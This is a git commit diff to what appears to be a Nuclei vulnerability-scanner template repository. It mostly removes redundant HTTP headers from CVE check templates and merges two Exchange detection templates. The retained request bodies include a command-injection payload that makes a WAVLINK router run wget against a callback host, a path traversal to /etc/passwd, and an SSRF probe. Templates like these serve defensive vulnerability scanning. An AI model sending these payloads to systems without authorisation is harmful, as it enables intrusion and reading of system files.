more updates

2021-08-20 02:14:42 +05:30 · 2021-08-20 02:14:42 +05:30 · 3f803deb28
parent 3fe4bc5206
commit 3f803deb28
9 changed files with 13 additions and 57 deletions
--- a/cves/2019/CVE-2019-8446.yaml
+++ b/cves/2019/CVE-2019-8446.yaml
@ -12,7 +12,6 @@ requests:
      - |
        POST /rest/issueNav/1/issueTable HTTP/1.1
        Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
        Connection: Close
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
        X-Atlassian-Token: no-check
--- a/cves/2020/CVE-2020-13117.yaml
+++ b/cves/2020/CVE-2020-13117.yaml
@ -14,16 +14,12 @@ requests:
      - |
        POST /cgi-bin/login.cgi HTTP/1.1
        Host: {{Hostname}}
-        Cache-Control: max-age=0
-        Upgrade-Insecure-Requests: 1
        Origin: http://{{Hostname}}
        Content-Type: application/x-www-form-urlencoded
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
-        Connection: close

        newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en
+
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
--- a/cves/2020/CVE-2020-5307.yaml
+++ b/cves/2020/CVE-2020-5307.yaml
@ -15,8 +15,6 @@ requests:
        POST /dfsms/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Connection: close
        Content-Length: 66

--- a/cves/2021/CVE-2021-24472.yaml
+++ b/cves/2021/CVE-2021-24472.yaml
@ -14,8 +14,6 @@ requests:
        GET /?qtproxycall=http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)

    matchers-condition: and
    matchers:
--- a/cves/2021/CVE-2021-26855.yaml
+++ b/cves/2021/CVE-2021-26855.yaml
@ -6,7 +6,7 @@ info:
  severity: critical
  description: |
      Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
-  tags: cve,cve2021,ssrf,rce,exchange,oob
+  tags: cve,cve2021,ssrf,rce,exchange,oob,microsoft
  reference: |
      - https://proxylogon.com/#timeline
      - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
--- a/cves/2021/CVE-2021-28149.yaml
+++ b/cves/2021/CVE-2021-28149.yaml
@ -18,24 +18,12 @@ requests:
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
-        Upgrade-Insecure-Requests: 1
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-        Accept-Encoding: gzip, deflate
-        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
-        Connection: close

      - |
        GET /log_download.cgi?type=../../etc/passwd HTTP/1.1
        Host: {{Hostname}}
-        Cache-Control: max-age=0
        Authorization: Basic YWRtaW46YWRtaW4=
-        Upgrade-Insecure-Requests: 1
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-        Accept-Encoding: gzip, deflate
-        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
-        Connection: close
+

    matchers-condition: and
    matchers:
--- a/exposed-panels/microsoft-exchange-login.yaml
+++ b/exposed-panels/microsoft-exchange-login.yaml
@ -1,23 +0,0 @@
-id: exchange-login
-
-info:
-  name: Microsoft Exchange login page
-  author: dhiyaneshDK
-  severity: info
-  reference: https://www.exploit-db.com/ghdb/6739
-  tags: panel
-
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/owa/auth/logon.aspx'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '<title>Exchange Log In</title>'
-          - '<title>Microsoft Exchange - Outlook Web Access</title>'
-      - type: status
-        status:
-          - 200
--- a/misconfiguration/aem/aem-groovyconsole.yaml
+++ b/misconfiguration/aem/aem-groovyconsole.yaml
@ -15,7 +15,6 @@ requests:
    headers:
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
      Accept-Language: en-US,en;q=0.9,hi;q=0.8
-      User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36

    matchers-condition: and
    matchers:
--- a/technologies/microsoft-exchange-server-detect.yaml
+++ b/technologies/microsoft-exchange-server-detect.yaml
@ -2,30 +2,31 @@ id: microsoft-exchange-server-detect

 info:
  name: Microsoft Exchange Server Detect
-  author: pikpikcu
+  author: pikpikcu,dhiyaneshDK
  severity: info
  reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse
-  description: |
-       Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data.
+  description: Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data.
+  tags: microsoft,exchange,tech

 requests:
  - method: GET
    path:
      - "{{BaseURL}}/owa/auth/logon.aspx"

-    matchers-condition: and
+    matchers-condition: or
    matchers:
-      - type: status
-        status:
-          - 200

      - type: regex
        regex:
          - "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)"
        part: all

+      - type: word
+        words:
+          - '<title>Exchange Log In</title>'
+          - '<title>Microsoft Exchange - Outlook Web Access</title>'
+
    extractors:
      - type: kval
-        part: header
        kval:
-          - X-Owa-Version
+          - X_Owa_Version